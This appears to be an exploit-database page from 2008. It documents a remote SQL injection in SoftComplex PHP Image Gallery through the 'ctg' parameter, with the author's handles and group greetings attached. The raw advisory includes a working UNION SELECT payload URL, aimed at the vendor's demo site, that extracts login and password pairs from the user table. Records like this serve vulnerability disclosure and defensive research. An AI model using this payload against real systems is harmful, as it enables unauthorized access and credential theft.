header-logo
Suggest Exploit
vendor:
PHP Image Gallery
by:
Hussin X
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: PHP Image Gallery
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability

A remote SQL injection vulnerability exists in SoftComplex PHP Image Gallery (ctg). An attacker can send a specially crafted HTTP request containing malicious SQL statements to the vulnerable application in order to gain access to unauthorized data or to execute system level commands.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
___________________________________

Author:  Hussin X

Home :  www.IQ-TY.com  & www.TrYaG.cc

MaiL :   darkangeL_G85@Yahoo.CoM
___________________________________

script    : http://www.softcomplex.com/products/php_image_gallery/demo2/

_____

ExploiT & demo
_____________

http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show




____________________________( Greetz )_________________________________
|
|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
|
|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
|
|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
|_____________________________________________________________________


                   Im IRAQi    |    Im TrYaGi

# milw0rm.com [2008-11-06]